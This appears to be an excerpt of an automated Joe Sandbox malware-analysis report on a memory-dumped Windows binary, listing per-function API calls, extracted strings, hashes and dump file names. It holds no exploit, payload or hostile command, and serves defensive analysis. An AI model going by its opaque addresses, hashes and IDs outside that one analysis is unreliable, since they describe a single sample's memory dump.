                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock_memmove
                                                                      • String ID: EA06
                                                                      • API String ID: 1988441806-3962188686
                                                                      • Opcode ID: 43ca834e010af55c3873c75c67de72069bf5f0e04685280d75cb677ec698b73b
                                                                      • Instruction ID: ee3741144c25d59b86f5654ffedf26ff3f06f9cc79254e78a56f45f3a1040e9c
                                                                      • Opcode Fuzzy Hash: 43ca834e010af55c3873c75c67de72069bf5f0e04685280d75cb677ec698b73b
                                                                      • Instruction Fuzzy Hash: FA01F971C042187EDB19DAA9CC16FFE7BF8DB11701F00459FF592D2181E579E6049760
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FF8D6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
                                                                      • Instruction ID: 0e828ea2e0427c75c59f2ef43c025e7fc0375ee54f7d1e906345f63624ec73a6
                                                                      • Opcode Fuzzy Hash: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
                                                                      • Instruction Fuzzy Hash: AB01D4B1A4110DABCB24EBA0CD52EFF77A8DF1A390F100019B905672A1DE195E0CF271
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FF8DEE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
                                                                      • Instruction ID: 47d21ac87dbd655b76759542a53931bd4f88f30530b99acd26f28bb746a1b8a4
                                                                      • Opcode Fuzzy Hash: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
                                                                      • Instruction Fuzzy Hash: 8401A2B1A4110DA7DB25EBA4CD42EFF77ACDF16390F100019B945A72A2DE298E0DF271
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp
                                                                      • String ID: #32770
                                                                      • API String ID: 2292705959-463685578
                                                                      • Opcode ID: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
                                                                      • Instruction ID: 6fe23d54de6d20e493c9998c278bcf2140407e5cf80e333c5cd41b2698f15c8a
                                                                      • Opcode Fuzzy Hash: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
                                                                      • Instruction Fuzzy Hash: 49E0D8336002292BE730AA9AAC4AFA7F7FCEB45B70F01005BFD44D7041D565AB4587E0
                                                                      APIs
                                                                        • Part of subcall function 00FDB314: _memset.LIBCMT ref: 00FDB321
                                                                        • Part of subcall function 00FC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FDB2F0,?,?,?,00FA100A), ref: 00FC0945
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FDB2F4
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FDB303
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FDB2FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3158253471-631824599
                                                                      • Opcode ID: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
                                                                      • Instruction ID: 3987e6fc83d0ca67511c2f8893248d23edd2c54a569be5f9b96fdd37f6ca7d19
                                                                      • Opcode Fuzzy Hash: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
                                                                      • Instruction Fuzzy Hash: B1E065B0600302CBD7309F29E9047427AE8AF01794F058A6EE486C7745EBB9E408EBA1
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00FE1775
                                                                        • Part of subcall function 0101BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00FE195E,?), ref: 0101BFFE
                                                                        • Part of subcall function 0101BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0101C010
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FE196D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                      • String ID: WIN_XPe
                                                                      • API String ID: 582185067-3257408948
                                                                      • Opcode ID: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
                                                                      • Instruction ID: 5c9a39efadd74ec8dafc6329771c6c908db397f8d09cd61e52d19ebb165bec2e
                                                                      • Opcode Fuzzy Hash: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
                                                                      • Instruction Fuzzy Hash: 33F0EDB1801149DFDB25DF92C594BECBBF8BB18701F640089E142A2194DB764F88EF60
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0102596E
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01025981
                                                                        • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
                                                                      • Instruction ID: 56922b281b37a31d82cc4fb86904661d7fed76037d2f6615d19db82c8a0d2fc0
                                                                      • Opcode Fuzzy Hash: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
                                                                      • Instruction Fuzzy Hash: 3DD0C931384312B6E6B4BA719C0EFD77A24AF14B90F100829BBC9AA1C4C9F59800CB54
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010259AE
                                                                      • PostMessageW.USER32(00000000), ref: 010259B5
                                                                        • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
                                                                      • Instruction ID: 1a12597c1c7201f9bccd8c9dcdec4010ad85c1f96ff333ccbbfe9a7e752686f4
                                                                      • Opcode Fuzzy Hash: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
                                                                      • Instruction Fuzzy Hash: 3DD0C9313803127AE6B5BA719C0EFD77624AF15B90F100829BBC5AA1C4C9F5A800CB54